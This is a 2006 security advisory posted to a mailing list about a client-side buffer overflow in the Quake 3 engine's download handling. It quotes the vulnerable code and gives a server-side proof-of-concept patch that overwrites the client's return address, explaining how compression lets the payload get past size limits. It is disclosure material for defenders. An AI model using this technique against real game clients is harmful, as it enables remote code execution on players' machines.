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[NEWS] Quake 3 Engine Client Buffer Overflow

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From: SecuriTeam <>
To: [email protected]
Date: 5 Jun 2006 18:08:06 +0200
Subject: [NEWS] Quake 3 Engine Client Buffer Overflow
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  Quake 3 Engine Client Buffer Overflow


The  <>; Quake 3 engine is the famous game engine 
developed by id Software.

Improper handling of user input allows attackers to cause a buffer 
overflow and execute arbitrary code in Quack 3 based engines.


Vulnerable Systems:
 * Quake 3 version 1.32c and prior
 * Quake 3 revision 795 and prior

The CL_ParseDownload function located in code/client/cl_parse.c is used by 
the clients for handling the download commands (svc_download) received 
from the server.

The function uses a signed 16 bit number sent by the server for copying 
raw data from the network to the data buffer of 16384 (MAX_MSGLEN) bytes:

void CL_ParseDownload ( msg_t *msg ) {
    int     size;
    unsigned char data[MAX_MSGLEN];
    size = MSG_ReadShort ( msg );
    if (size > 0)
        MSG_ReadData( msg, data, size );

Some interesting details:
The (reassembled) packets handled by Quake 3 can be max 16384 bytes but is 
possible to bypass this limit through the Huffman compression used 
automatically and trasparently in the engine (thanks to Thilo Schulz).
In short for exploiting this bug is enough to use 16384 NULL (0x00) bytes, 
which occupy a very small amount of space, followed by the usual "stuff" 
(return address to overwrite and shellcode).
The data copied with the MSG_ReadData is raw so there are no bad bytes to 
avoid for the exploitation.
Note that the svc_download can be sent to the client in any moment so the 
client can be attacked also immediately after the ending of the connect 
handshake (just the first server's message).

The server must be modified for sending the malformed svc_download command 
and is possible to use the following instructions which demonstrate how to 
overwrite the return address with 0x61616161.
It's enough to place them in code/server/sv_client.c just after the "// 
send the gamestate" comment at about line 575:

    // send the gamestate
    int     i;
    MSG_WriteByte( &msg, svc_download );
    MSG_WriteShort( &msg, -1 );         // block != 0, for fast return
    MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy
    for(i = 0; i < 16384; i++) {        // overwrite the data buffer
        MSG_WriteByte(&msg, 0x00);      // 0x00 for saving space
    for(i = 0; i < 32; i++) {           // do the rest of the job
        MSG_WriteByte(&msg, 'a');       // return address: 0x61616161
    SV_SendMessageToClient( &msg, client );

Vendor Status:
 * Icculus will release a fix.
 * ID Software did not respond.
 * Other vendors were not modified.


The information has been provided by  <> Luigi 
The original article can be found at:  

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